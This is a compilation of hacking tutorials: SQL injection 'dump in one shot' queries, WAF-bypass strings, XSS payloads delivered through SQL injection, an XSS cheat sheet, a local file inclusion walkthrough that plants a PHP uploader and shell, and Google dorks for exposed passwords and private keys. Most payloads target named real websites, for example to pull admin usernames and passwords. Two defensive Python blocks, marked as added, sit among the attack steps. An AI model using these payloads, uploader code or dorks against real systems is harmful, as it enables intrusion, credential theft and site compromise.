Basics of SQLi DIOS by Mr.Cyb3rwarrior

Hi Guyzz 
ADesh kolte(Mr.Cyb3rwarrior)

Today I am making a tutorial on the basics of Dump in One Shot [DIOS].

I already know the tutorials by Ajkaro and by Zen javanicus; Code ninja is best on this DIOS.

And I too learned from their tutorials. But some of my friends still don't understand DIOS and want to learn it, and some friends messaged me asking to learn it. So I decided to make a tutorial on DIOS. So let's start.


======================================================

First see this query :->

(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.schemata)where (@a)in (@a:=concat(@a,schema_name,'<br>'))))a)


The above query returns all DATABASES.

Here (@a) is a user variable. We select this variable from information_schema.schemata, and the 'IN' clause concatenates every schema name onto it.


So i practiced above query like this :->


(
/*1st select is selecting variable*/
select (@a) from

(
/*2nd select  storing 0x00 i variable. So if you want to store something then store in this 2nd select.Also we select third select after that but seperated with comma(,) */
select (@a:=0x00),

(
/*Now this third select. In this select  we write our main query like to select database query,table query(information_schema.tables),column query(information_schema.columns).
Also we write our condition in this third select see where part here :-> where (@a)
Also we can use 2 or more than 2 condition in this third select :-> where table_name!='information_schema' and (@a) in
Don't forget to use and to use more than one condition

See more condition :-> where table_name!='information_schema'  and table_name like 'us%' and (@a) in
Like this we can use many condition
With that condition like  we get only that table_name which start with us
So i want to say you that you guys should play with sql queries so that you learn more and can use your desired condition which get great result.
*/
select (@a) from (information_schema.schemata) where (@a) in 

(
/*Now in third select after 'IN' Clause we use our concat part.Note that this is use so that we see our desire result on page.
Like Table Name :-> Admin we see like this on page*/
@a:=concat
(
/*Here we use @a variable mean till now what we do is using variable come here so that we our desire result using that variable.So always include this variable in concat part*/
@a,schema_name,'<br>'

)


)



)


)


a)




So I wrote down everything that is essential to note while doing DIOS.
That is the way I learned DIOS.


In short :->

The 1st select is used to select the variable.

The 2nd select is used to store a value in the variable. We can store multiple values in different variables, separated by commas. Like :->
(@a:=0x00),(@tbl:=0x00),(@count:=0x00)
See, all those variables store a value and are separated by commas.


The 3rd select is used to write our main query, the conditions, and the concatenation.



Now see this in live action :->


DATABASES :->

http://www.nhlegendsofhockey.com/news.php?id=-'65' union select 1,2,3,

(
select (@a) from

(
select (@a:=0x00),
(
select (@a) from (information_schema.schemata) where (@a) in 
(
@a:=concat
(
@a,schema_name,'<br>'

)

)

)

)
a)

,5,6,7,8,9,10--+


We write the query this way while practicing. Once we see that it is written correctly, we write the above query on one line to check it, like this :->

http://www.nhlegendsofhockey.com/news.php?id=-'65' union select 1,2,3,(select (@a) from(select (@a:=0x00),(select (@a) from (information_schema.schemata) where (@a) in(@a:=concat(@a,schema_name,'<br>'))))a),5,6,7,8,9,10--+


We see this result :->  



To do more better :->

http://www.nhlegendsofhockey.com/news.php?id=-'65' union select 1,2,3,(select (@a) from(select (@a:=0x00),(select (@a) from (information_schema.schemata) where (@a) in (@a:=concat(@a,'<br>',schema_name,'<br>'))))a),5,6,7,8,9,10--+


Result





Notice the change when we use <br>  before schema_name


Ok now to select Table names with more experiment in concat part :->


First with learning mode ====>

http://www.nhlegendsofhockey.com/news.php?id=-'65'  union select 1,
(
select (@a)  from 
(

select (@a:=0x00),

(
select (@a) from (information_schema.tables) where (@a) in 
(
@a:=concat
(
@a,'<br><font color=red size=5>Table name :-> </font>',table_name,'<br>'
)
)
)
)
a),5,6,7,8,9,10--+



Then in Real mode :->

http://www.nhlegendsofhockey.com/news.php?id=-'65' union select 1,2,3,(select (@a)  from (select (@a:=0x00),(select (@a) from (information_schema.tables) where (@a) in(@a:=concat(@a,'<br><font color=red size=5>Table name :-> </font>',table_name,'<br>'))))a),5,6,7,8,9,10--+


Result :->

=====================================================

Now to get the table names that do not belong to information_schema :->


http://www.nhlegendsofhockey.com/news.php?id=-'65' union select 1,2,3,(select (@a) from(select (@a:=0x00),(select (@a) from (information_schema.tables) where table_schema !='information_schema' and (@a) in (@a:=concat(@a,'<br><font color=red size=5>Table name :-> </font>',table_name,'<br>'))))a),5,6,7,8,9,10--+


Now we get only those tables which do not belong to information_schema.

What I used there :->  where table_schema!='information_schema' and (@a) in

Please note that we write information_schema inside ' '. You can also change it to hex format if necessary.


Result :->


From now on I will not write the experiment mode like :->

(
select (@a) etc etc etc
)


Because I think you guys have now learned this way of practicing. Whenever you get confused, write the query in this manner first (experiment mode). Once you see the query is correct, check it after slightly modifying it, like I did before.



======================================================

Now to get column names :->


http://www.nhlegendsofhockey.com/news.php?id=-'65' union select 1,2,3,(select (@a) from(select (@a:=0x00),(select (@a) from (information_schema.columns) where table_schema !='information_schema' and (@a) in (@a:=concat(@a,'<br><font color=red size=5>Column name :-> </font>',column_name,'<br>'))))a),,5,6,7,8,9,10--+

Result :->



Now to get both table names and column names :->

http://www.nhlegendsofhockey.com/news.php?id=-'65' union select 1,2,3,(select (@a) from(select (@a:=0x00),(select (@a) from (information_schema.columns) where table_schema !='information_schema' and (@a) in (@a:=concat(@a,'<br><font color=lime size=5>Table  name :-> </font>',table_name,'<br><font color=red size=5>Column name :-> </font>',column_name,'<br>'))))a),5,6,7,8,9,10--+


Result :->


See, we got both table names and column names in ONE SHOT.


======================================================

Extracting columns from tables

Now the table name :-> staff
Table name is "staff"
Columns used are "name" and "email"
http://www.nhlegendsofhockey.com/news.php?id=-'65' union select 1,2,3,(select (@a) from(select (@a:=0x00),(select (@a) from  staff where  (@a) in (@a:=concat(@a,'<br><font color=red size=5>Name  :-> </font>',name,'<br><font color=magenta size=5>Email :-> </font>',email,'<br>'))))a),5,6,7,8,9,10--+


Result :->


Sorry, on this website the Email column is blank. For this reason the Email is not printed.
=====================================================

Time to do more experiment :->


Get table names starting with "st" and column names starting with "st" :->


http://www.nhlegendsofhockey.com/news.php?id=-'65' union select 1,2,3,(select (@a) from(select (@a:=0x00),(select (@a) from (information_schema.columns) where table_schema!='information_schema' and  table_name like 'st%' and column_name like 'st%'   and (@a) in (@a:=concat(@a,'<br><font color=lime size=5>Table  name :-> </font>',table_name,'<br><font color=red size=5>Column name :-> </font>',column_name,'<br>'))))a),5,6,7,8,9,10--+

Result :->




I used a condition there with the LIKE operator. So now it is all up to you how you play with this, experiment with DIOS, and practice.

This is my whole basic tutorial on DIOS. If you like it, I will write more on advanced DIOS.

That's all. Hope you guys learned something.
Thanks for reading.




=====================================================

Union Based SQL Injection (WAF Bypassing) Tutorial By Mr.cyb3rwarrior_Ades


After Our Tutorial on Basics Of SQL Injection.
Union based SQL injection + WAF Bypassing By Adesh

Today i m Going To Discuss About Union based SQL injection And WAF Bypassing Techniques.
Lets Start Injecting.
Target Site:http://radiozhakkasmarathi.in/full_review.php?id=3
Add Single Quote (') at the End Of The URL
http://radiozhakkasmarathi.in/full_review.php?id=3'



 And Get MYSQL Error.
Lets Balance Our Query  for Further Injecting.
--

http://radiozhakkasmarathi.in/full_review.php?id=3--+

http://radiozhakkasmarathi.in/full_review.php?id=3-- -

http://radiozhakkasmarathi.in/full_review.php?id=3%23

http://radiozhakkasmarathi.in/full_review.php?id=3;

Here Is A Small Explanation on Balance and Comment in our Injection.



After Balancing Our Query . Next is Count Total Number Of Columns
http://radiozhakkasmarathi.in/full_review.php?id=3' order by 1-- -
No Error !
http://radiozhakkasmarathi.in/full_review.php?id=3' order by 3-- -
No Error!

http://radiozhakkasmarathi.in/full_review.php?id=3'  order by 6-- -
Again No Error !

http://radiozhakkasmarathi.in/full_review.php?id=3'  order by 7-- -
Here We Get Error !
Error 2

Now Try To Find Our Vulnerable Columns.
http://radiozhakkasmarathi.in/full_review.php?id=-3'  union select 1,2,3,4,5,6-- -



If Our Target Site Is Protected with a WAF, the WAF Will Block Our Query and Give Us a Mod_Security Error.
So Here Are Some WAF Bypassing Methods.
    /*!%55NiOn*/ /*!%53eLEct*/
    %55nion(%53elect 1,2,3)-- -
    +union+distinct+select+
    +union+distinctROW+select+
    /**//*!12345UNION SELECT*//**/
    /**//*!50000UNION SELECT*//**/
    /**/UNION/**//*!50000SELECT*//**/
    /*!50000UniON SeLeCt*/
    union /*!50000%53elect*/
    +#uNiOn+#sEleCt
    +#1q%0AuNiOn all#qa%0A#%0AsEleCt
    /*!u%6eion*/ /*!se%6cect*/
    +un/**/ion+se/**/lect
    uni%0bon+se%0blect
    %2f**%2funion%2f**%2fselect
    union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
    REVERSE(noinu)+REVERSE(tceles)
    /*--*/union/*--*/select/*--*/
    union (/*!/**/ SeleCT */ 1,2,3)
    /*!union*/+/*!select*/
    union+/*!select*/
    /**/union/**/select/**/
    /**/uNIon/**/sEleCt/**/
    /**//*!union*//**//*!select*//**/
    /*!uNIOn*/ /*!SelECt*/
Just Change The Union Select With Following Bypass URLs.
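
From the defender's side, the list above shows why matching the literal text "union select" in a request is not enough, and the DIOS queries earlier add a second signal: a user variable accumulating rows (@a:=) over information_schema. The following Python code is an added example, not part of the original tutorial. It normalizes each parameter value roughly the way MySQL would read it before applying detection rules; the rule names and the sample query strings are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Rules run on the *normalized* value, never on the raw request text.
RULES = {
    "union_select": re.compile(
        r"\bunion\b(?:\s+(?:all|distinct|distinctrow))?\s*\(?\s*select\b"),
    "information_schema": re.compile(r"\binformation_schema\b"),
    # DIOS accumulates rows into a user variable: @a:=concat(@a, ...)
    "user_variable_assignment": re.compile(r"@\w*\s*:="),
}


def normalize(value: str) -> str:
    """Reduce one parameter value to roughly what MySQL would parse."""
    text = value
    for _ in range(3):                    # bounded, handles double encoding
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    # /*!50000union*/ and /*!union*/ are executed by MySQL: keep the body.
    text = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", text, flags=re.S)
    # Ordinary /* ... */ comments behave like whitespace.
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)
    # '#' and '-- ' comments end at the newline, so text after it still runs.
    text = re.sub(r"#[^\n]*", " ", text)
    text = re.sub(r"--(?:[ \t\r][^\n]*)?(?=\n|\Z)", " ", text)
    return re.sub(r"\s+", " ", text).strip().lower()


def scan_query_string(query: str) -> dict:
    """Map parameter name -> sorted list of rule names that fired."""
    findings = {}
    # Split before decoding so a '#' in one parameter cannot hide the next.
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        norm = normalize(value)
        hits = sorted(rule for rule, rx in RULES.items() if rx.search(norm))
        if hits:
            findings[name] = hits
    return findings


def naive_match(query: str) -> bool:
    """Baseline for comparison: decode once, look for the literal keywords."""
    return "union select" in unquote_plus(query).lower()


# Constructed query strings modelled on the variants listed on this page.
SAMPLES = {
    "versioned_comment": "id=-3'+/*!50000union*/+select+1,2,3,4,5,6--+-",
    "percent_encoded": "id=1+%55nion(%53elect+1,2,3)--+-",
    "line_comments": "id=1+%23x%0Aunion+all%23y%0Aselect+1,2",
    "double_encoded": "id=1+%2555nion+%2553elect+1",
    "dios": ("id=-1'+union+select+1,(select(@a)from(select(@a:=0x00),"
             "(select(@a)from(information_schema.schemata)where(@a)in"
             "(@a:=concat(@a,schema_name,'<br>'))))a),3--+"),
    "benign": "id=16&title=student+union+election+results",
}

if __name__ == "__main__":
    for label, query in SAMPLES.items():
        print(f"{label:18} naive={naive_match(query)!s:5} "
              f"normalized={scan_query_string(query)}")
```

Comment-splitting variants such as un/**/ion are not keywords to MySQL itself; they only matter when some layer strips comments before the query is built, so they are left out of the rules here.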

Lets Continue Our Tutorial.
Here Are Some Vulnerable Columns Checking Methods With Examples.
Using And 0
http://www.targetsite.com/news.php?id=11 and 0 Union Select 1,2,3,4,5--+

Using And False
http://www.targetsite.com/news.php?id=11 and false Union Select 1,2,3,4,5--+

Using Div 0
http://www.targetsite.com/news.php?id=11 Div 0 Union Select 1,2,3,4,5--+

Using null
http://www.targetsite.com/news.php?id=null Union Select 1,2,3,4,5--+

Using .1337
http://www.targetsite.com/news.php?id=11.1337 Union Select 1,2,3,4,5--+


http://www.targetsite.com/news.php?id=-11 Union Select 1,2,3,4,5--+

And For Our Target We Use
/*!50000union */ and concat/*!50000()*/

http://radiozhakkasmarathi.in/full_review.php?id=-3'  /*!50000union */  select 1,2,3,4,5,6-- -

We Will Get Our Vulnerable Columns Printed On The Page. 2 is Our Vulnerable Column.


Here Are Some Variables Of MYSQL.
@@version        = Current Version
@@GLOBAL.VERSION = Current Version
User()           = Current User
Database()       = Current Database

for Version :http://radiozhakkasmarathi.in/full_review.php?id=-3'  /*!50000union */  select 1,@@version ,3,4,5,6-- -

We Can See Current Version Printed on the Page.
 Next Step Is To Get  The Tables.
we DIOS it

http://radiozhakkasmarathi.in/full_review.php?id=3' and 0 /*!50000Union*/ Select 1,concat/*!50000(0x3c666f6e7420636f6c6f723d7265643e3c746974746c653e4d722e635962337277615272696f725f41646573686b6f6c74653c746974746c653e,0x3c6c693e,version(),0x3c6c693e,user(),0x3c6c693e,database(),make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@))*/,3,4,5,6-- -

Lets Execute our DIOS Query



We can See Total Tables in Our Primary Database.
Now if you Want To Get Admin Details Of The Target Site check the Table name of Admin.
then  write Query
Example:
http://radiozhakkasmarathi.in/full_review.php?id=3' and 0 /*!50000Union*/ Select 1,concat/*!50000(username,0x3a3a,password)*/,3,4,5,6 from site_user -- -



Enjoy :]
Tutorial By Adesh kolte
contact Us on FB
https://www.facebook.com/kolteAdesh


xss via SqL injection part 2 tutorial

Manipulating SQL Injection Queries in XSS Payload

If we go on Further, we can also show our SQLi Query Results in an XSS POP-Up Alert. We will insert our SQLi Queries in the XSS Payload to show the SQL Query output in a POP-Up.
First let's say we want to Show The Current Version of the Target Site in an XSS POP-Up. See the example,

Our XSS Payload for Showing Version in a POP-Up:

<img src=x onerror="javascript:alert('Your_name:Version:,version(),0x')">

The Red highlighted Text is our SQLi Query and Blue Text is injector name and the Green Text is That we have put for our Variable , and the Other one is Our XSS Payload.
Before executing our Query we need to encode our XSS Payload in Hex Value.
  
 Hex Value of XSS Payload:
0x3c696d67207372633d78206f6e6572726f723d226a6176617363726970743a616c6572742827496e6a6563746564206279204d722e437962337277617272696f725f41646573687e3a56657273696f6e3a,version(),0x30782729223e
Let's insert our XSS Payload in the Vulnerable column for Showing the Pop-up for Current Version.

http://www.lokmat.com/storypage.php?catid=31&newsid=3448'union select  1,2,concat(0x3c696d67207372633d78206f6e6572726f723d226a6176617363726970743a616c6572742827496e6a6563746564206279204d722e437962337277617272696f725f41646573687e3a56657273696f6e3a,version(),0x30782729223e

),4,5,6,7,8,9--+
Let's Execute our Payload:

And here we got the Current Version in an XSS Pop-up. We can Do the Same For the Current Database and user.
After the Version POP-UP, the next part is Showing Tables in an XSS POP-UP Alert. So we have to Insert our Query in the XSS Payload for Displaying them in the XSS Alert.
Here is our DIOS Query for getting Tables from the Current Database.

(select group_concat(table_name) from information_schema.tables where table_Schema=database())
Let's Add this DIOS Query in our XSS Payload .
http://www.lokmat.com/storypage.php?catid=31&newsid=3448'union select  1,2,concat(0x3c696d67207372633d78206f6e6572726f723d226a6176617363726970743a616c6572742827496e6a6563746564204279204d722e637962337277617272696f7241646573687e3a56657273696f6e3a,version(),(select group_concat(table_name) from information_schema.tables where table_Schema=database()),0x30782729223e),4,5,6,7,8,9--+

Now execute this Query and Check the output Response:



We got the Tables from the current Database. But if we go on Further and add HTML TAGS like <BR> for Starting each Table on a New Line, the HTML Doesn't Work Here.
In XSS we use " \n ", which is used for showing each result on a new Line. So we will add This Part to Our DIOS Query to show All Tables on a New Line in our XSS Pop-Up.

We Need to First Encode it in Hex Value and then Insert into DIOS Query.

HEX Value: \n converted into hex is 0x5c6e

Let's Add it in our XSS Payload :
http://www.lokmat.com/storypage.php?catid=31&newsid=3448'union select  1,2,concat(0x3c696d67207372633d78206f6e6572726f723d226a6176617363726970743a616c6572742827496e6a6563746564204279204d722e637962337277617272696f7241646573687e3a56657273696f6e3a,version(),(select group_concat(0x5c6e,table_name) from information_schema.tables where table_Schema=database()),0x30782729223e),4,5,6,7,8,9--+

And Here we can see all tables are starting on a New line in the XSS Pop-up Alert Box. We can do the Same For Columns by adding that Part in our DIOS Query. I Leave That part for You Guys.
Enjoy :]








Xss using Sql injection Tutorial 1

In this Tutorial you will learn XSS Attack via SQL Injection.
If you are new to XSS then I Suggest You First Read the Basics from the Previous Tutorial to know How it Works and What an attacker can do with an XSS vulnerability. Once you have the Basic knowledge About XSS Attack then you will be able to better Understand this Tutorial "XSS with SQL Injection".
In XSS Attack via SQL Injection we will Execute our XSS payloads in a UNION BASED query.


For Example:
We have Found a website Which is vulnerable to SQL Injection and inject into the database.But there we  can also Execute our XSS Payloads in our Union Based Query.lets Take a site for Practice,
Here is The TARGET Site 

http://www.lokmat.com/storypage.php?catid=31&newsid=3448

After Counting the Columns there are 9 Total Number of Columns.So let's ready up our Union Based Query and execute it .
http://www.lokmat.com/storypage.php?catid=31&newsid=3448'union select  1,2,3,4,5,6,7,8,9--+

There we got 3rd  Column is printed on the page as output  , So we will execute our XSS Payload in that column
Here is the our XSS Payload that we are going to inject into the UNION BASED Query,

XSS PAYLOAD : <script>alert('Injected BY Mr.cyb3rwarrior-Adeshkolte');</script>
Before executing this Payload we need to Encode it in HEX Value (use hackbar)

HexValue:0x3c7363726970743e616c6572742827496e6a6563746564204259204d722e637962337277617272696f722d41646573686b6f6c746527293b3c2f7363726970743e
Let's Insert this payload in our Union Based Query and Execute the query,

http://www.lokmat.com/storypage.php?catid=31&newsid=3448'union select  1,2,0x3c7363726970743e616c6572742827496e6a6563746564204259204d722e637962337277617272696f722d41646573686b6f6c746527293b3c2f7363726970743e,4,5,6,7,8,9--+
output
















This Payload will Display an XSS Pop-up Alert. This is the basic XSS Payload; you can try more Payloads, which will be posted in the next tutorial.
Enjoy


XSS Cheat Sheet:

This vulnerability occurs due to poor development of the application code. An attacker is able to inject his malicious HTML code through client web browsers.
Mostly the whole XSS attack is based on JavaScript and HTML for executing malicious code in the target website. Once an attacker is able to run his code with JavaScript on the web, then when a user comes to the site and clicks on that malicious link, that JavaScript will be executed. Mostly people do XSS and show a pop-up with their name to advertise themselves.
XSS can be used for phishing as well as stealing accounts, or we can do some social engineering with XSS.
XSS Cheat Sheet:
<script>alert(1);</script>
<script>alert('XSS');</script>
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
<IMG SRC=javascript:alert('XSS')>
<scr<script>ipt>alert('XSS');</scr</script>ipt>
'><script>alert(0)</script>
<img src=foo.png onerror=alert(/xssed/) />
<style>@import'ja asc
ipt:alert("XSS")';</style>
<? echo('<scr)'; echo('ipt>alert("XSS")</script>'); ?>
<marquee><script>alert('XSS')</script></marquee>
<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
<script src=http://yoursite.com/your_files.js></script>
</title><script>alert(/xss/)</script>
<IMG DYNSRC="javascript:alert('XSS')">
<img src=javascript:alert('XSS')>
<script language=JavaScript>alert('XSS')</script>
<body onunload=javascript:alert('XSS');>
<body onLoad='alert('XSS');'
[color=red' onmouseover='alert('xss')']mouse over[/color]
'/></a></><img src=1.gif onerror=alert(1)>
window.alert('Bonjour !');
<div style='x:expression((window.r==1)?'':eval('r=1;
<iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>
'>><marquee><h1>XSS</h1></marquee>

Shell Uploading Using LFI by Mr.Cyb3rWarrior (ADesh kolte)





Today I Show How To Hack A Website Using LFI:- Please Do Not Deface This

               Target Site:- http://www.clginstitute.org

Step:1 Find The LFI Target Point On This Website:-

Target LFI Point:-

http://www.clginstitute.org/?content=newsandevent.php



Step:2 Now Remove All Text After The (./?content=) Now Url looking Like This:-

http://www.clginstitute.org/?content=



Step:3 Put The Back_slash After The (./?content=) Now Url looking Like This:-

http://www.clginstitute.org/?content=/

If You Get Any Error After Putting The (/) Then The Chance Of Being Vulnerable To LFI Is 80%. If You See Data Hidden On The Website, Then The Chance Of Being Vulnerable To LFI Is 50-50%.

Here Is The Error We Got On The Website After Putting (/)



Warning: include(/): failed to open stream: No such device in /home/clginsti/public_html/callpage.php on line 9



Warning: include(): Failed opening '/' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/clginsti/public_html/callpage.php on line 9











Step:4 Put This Code After The (./?content=) /proc/self/environ Now Url Look Like This:-

 http://www.clginstitute.org/?content=/proc/self/environ

After Putting /proc/self/environ You See Some Session Request On The Website. That Means We Are Able To Upload Our Shell.





Step:5 Open The Tamper Data(Mozila Addone) And Start The Tampering The data And refress The Traget Url:-



Step:6 Put Your Uploader Code in tamper Data On The User_code Or Accept, I Put My Uploader Code On The Accept.

And Submit The Request.

Uploader Code:-







<?php

echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';

echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';

if( $_POST['_upl'] == "Upload" ) {

    if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }

    else { echo '<b>Upload GAGAL !!!</b><br><br>'; }

}

?>



Step:7 Now You Seen Our Uplader in The Website, Here Upload Your shell And Submit Your Request in Tamper Data.

Step:8 Now Agin Put Your Uploader Code On The Accept, Using The Tamper data During The Shell Uploading Time.

Step:9 Your Shell Got Uploaded On the Server Check  It Now.



Tnx For See My tutorials Please Post Your Positive Comment If You Learn Something New.

And Also Post Your Webhacking tutorials in Fourm.

BY Mr.Cyb3rWarrior (Adesh kolte)
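
The warnings in Step 3 show callpage.php passing the content parameter straight to include(), and Step 6 depends on a request header being readable back through /proc/self/environ. As an added example (not the site's code and not the author's), the following Python code shows the two defensive checks that break this chain: resolving content only through an allowlist, and flagging requests that carry a path in content or a PHP open tag in a header. The directory, page names and sample requests are assumptions constructed for illustration.

```python
import re
from pathlib import Path

PAGES_DIR = Path("/srv/site/pages")                       # assumed layout
ALLOWED_PAGES = frozenset({"newsandevent.php", "home.php"})  # assumed names

# No legitimate Accept or User-Agent value contains a PHP open tag.
PHP_OPEN_TAG = re.compile(r"<\?")


def resolve_content(param, pages_dir=PAGES_DIR, allowed=ALLOWED_PAGES):
    """Return the file to include for ?content=..., or None (send a 404)."""
    if param not in allowed:
        return None
    base = pages_dir.resolve()
    target = (base / param).resolve()
    # Second line of defence: a symlink or a bad allowlist entry must not
    # lead outside the pages directory.
    if base not in target.parents:
        return None
    return target


def request_findings(content_param, headers):
    """Return the reasons a request looks like the probe described above."""
    findings = []
    if resolve_content(content_param) is None:
        findings.append("content_not_allowlisted")
    parts = content_param.split("/")
    if content_param.startswith("/") or ".." in parts or "\x00" in content_param:
        findings.append("path_in_content")
    for name, value in headers.items():
        if PHP_OPEN_TAG.search(value):
            findings.append("php_tag_in_header:" + name.lower())
    return findings


# Constructed requests: (content parameter, headers).
SAMPLE_REQUESTS = {
    "normal": ("newsandevent.php",
               {"Accept": "text/html,application/xhtml+xml",
                "User-Agent": "Mozilla/5.0"}),
    "empty_probe": ("", {"Accept": "text/html"}),
    "slash_probe": ("/", {"Accept": "text/html"}),
    "environ_with_header_code": (
        "/proc/self/environ",
        {"Accept": "<?php /* constructed marker, no payload */ ?>"}),
}

if __name__ == "__main__":
    for label, (content, headers) in SAMPLE_REQUESTS.items():
        print(f"{label:26} include={resolve_content(content)} "
              f"findings={request_findings(content, headers)}")
```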


Basic part of sqli practically



hello Guyzzz

only for educational purpose

let me introduce myself



im Adesh kolte  and im from india,



this is my first tutorial on basic sql injection



this was the basic tutorial so it will be  little lengthy so be patient while watching



im not discussing any theory regarding sql injection, so i recommend you watch some articles about sql db structure and the backend process of sql injection to understand sql injection in a better way. so im discussing only the practical part.



before starting injecting download the following tool from google



=>  hackbar addon or rootkajji addon for mozilla firefox.



ok lets start with basic  based sql injection





site>  http://greenwall.org/recent-news.php?id=16

we can check whether the site is vulnerable to sql injection or not by putting a single quote or a backslash (\) after the parameter [id=2]. lets try it on a site



http://greenwall.org/recent-news.php?id=16 '

'



we got the following error





=> check the manual that corresponds to your MySQL server version for the right syntax to use near ''-- -' at line 1

that mean this site is vulnerable to sql injection





and sometimes even if the site doesn't show this error there is a chance of sql injection vulnerability

in such cases how can we know whether our target site is vulnerable or not ??

observe the site behaviour, meaning => when u put a single quote or backslash (\) after the parameter ( id=2' ) u can observe that some content is missing on the page or something on the page doesn't load normally, so it also means that our target site is vulnerable to sql injection.***



ok lets continue with our injection





 http://greenwall.org/recent-news.php?id=16 '





we got an sql error



first of all we have to fix the query before we go further



(fixing query is nothing but making the site load normally without any error)



usually we use -- in integer based to fix the query



http://greenwall.org/recent-news.php?id='16 '--+ (error fixed)







so we can continue to the next part, which is finding the number of columns in the site

there are many methods for finding the no. of columns; for now im showing only 2 methods.***

one with order by and the other with group by



1. order by



http://greenwall.org/recent-news.php?id='16 '

 order by 100--+



we got the following error



Query failed: blank some text missing



http://greenwall.org/recent-news.php?id='16 '

 order by 16--+

it means the site has less than 16 columns

now we have to use the union statement to find the vulnerable columns



http://greenwall.org/recent-news.php?id='16 '+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16-- -



u can see the numbers 3 and 4 on the page (vulnerable columns)

now we can get everything from these vulnerable columns

lets get some basic information



note::



1. version() or @@version  => to display version of server



2. user() or @@user => to display the username of site







ok lets get them one by one





http://greenwall.org/recent-news.php?id='16 '+UNION+ALL+SELECT+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16-- -



result on web page =>



5.6.29



http://greenwall.org/recent-news.php?id='16 '+UNION+ALL+SELECT+1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16-- -



result => green62_view@localhost







http://greenwall.org/recent-news.php?id='16 '+UNION+ALL+SELECT+1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16-- -



result => green62_site





thats all for this tutorial

Enjoy

tutorial by Adesh kolte

Video tutorial

Basic part of sqli

https://youtu.be/A-EYrT3i_v0

Hacking Using Google Dork List

Prerequisites: (This one is Easy!)
1. A modern webbrowser and a internet.
2. Time
 
[Level:Beginner]
 
Method 1: Facebook!We will be using a google dork to find usernames and passwords of many accounts including Facebook!
 
The Dork:  intext:charset_test= email= default_persistent=
 
Enter that into Google, and you will be presented with several sites that have username and passwords lists!
 
Method 2: WordPress!
 
This will look for WordPress backup files Which do contain the passwords, and all data for the site!The Dork: filetype:sql inurl:wp - content/backup - *
 
 
Method 3: WWWBoard!
 
This will look for the user and passwords of WWWBoard usersThe Dork: inurl:/wwwboard/passwd.txt
 
Method 4: FrontPage!
 
This will find all users and passwords, similar to above.The Dork: ext:pwd inurl:(service | authors | administrators | users) "# - FrontPage - "
 
Method 5: Symfony!This finds database information and loginsThe Dork: inurl:config/databases.yml - trac - trunk - "Google Code" - source - repository
 
Method 6: TeamSpeak! (big one!!!!!)This will search for the server.dbs file (a Sqlite database file With the SuperAdmin username and password!!!)The Dork: server - dbs "intitle:index of"
 
Method 7: TeamSpeak2!!! (also big!)This will find the log file which has the Super Admin user and pass in the Top 100 lines. Look for "superadmin account info:"The Dork: "inurl:Teamspeak2_RC2/server.log"
 
Method 8: Get Admin pass!Simple dork which looks for all types of admin infoThe Dork: "admin account info" filetype:log
 
 
Method 9: Private keys! (not any more!) This will find any .pem files which contain private keys.The Dork: filetype:pem pem intext:private
 
And the Ultimate one, the regular directory full of passwords....
 
Method 10: The Dir of Passwords! Simple one!The Dork: intitle:"Index of..etc" passwd


SQL Injection (Manually)


SQL Injection (Manually):-
Let’s Start:
Log on to http://www.website.com/news/news.php?id=130.
Basically we are going to send the queries through the URL to get results back on screen accordingly. The motive is to get the name of the table and the names of the columns in which usernames and passwords are stored, and finally to fetch them. Instead of copying and pasting the long links, simply click on "click here" and open in a new tab.
Step 1: Checking SQL Vulnerability.
First we have to check whether the website is vulnerable to SQL attack or not. To check for SQL vulnerability, add a ' sign after the URL.
http://www.website.com/news/news.php?id=130
Now it will return to some sql error like:
"You have an error in sql syntax.!$#^&((__+)()*&^%^in line 23"
Step 2: Find number of columns. Let's use the "ORDER BY" clause here; it is used to sort the columns. Choose any number, say 10. Here I have assumed that the number of columns can't be more than 10. "--" is used for making anything after it a comment.
Now go to the site which is vulnerable to SQL injection.
http://www.Website.com/news/news.php?id=130 order by 10--
Actually we instructed it to sort the result by the 10th column. But it returned an error, which means the number of columns is less than 10. Let's replace it with 9.
http://www.website.com/news/news.php?id=130 order by 9
But again we got an error. This means the number of columns is less than 9. Like this we keep on moving until we don't get any error. Finally we reach '6'.
http://www.website.com/news/news.php?id=130 order by 6--
We didn't get any error; this means there are 6 columns.
Step 3: Find vulnerable columns. Now let's use the "UNION ALL" and "SELECT" commands. Remember to put a dash (-) before 130.
http://www.website.com/news/news.php?id=-130 union select all 1,2,3,4,5,6--
We would get a couple of numbers on screen. The bold ones are the most vulnerable columns. In this case the most vulnerable is number 2.
Step 4: Find database version.
Replace the most vulnerable column with "@@version" or "version()" (if the first one doesn't work).
http://www.website.com/news/news.php?id=-130 union select all 1,@@version,3,4,5,6--
We got the version on screen. It is. The only thing to note is that the version is 5 point something, that is, greater than 5. We would have followed some other approach if the version were less than 5, because versions less than 5 have no default database like "information_schema", which stores information about the tables/columns of other databases.
Step 5: Finding table names.
Replace the vulnerable column number with "table_name".
http://www.website.com/news/news.php?id=-130 union select all 1,table_name,3,4,5,6 from information_schema.tables where table_schema=database()--
We got first table name on the screen.
To get all tables use group_concat:
http://www.website.com/news/news.php?id=-130 union select all 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()--
Step 6: Finding column names.
Similarly, get all the columns by simply replacing 'table' with 'column':
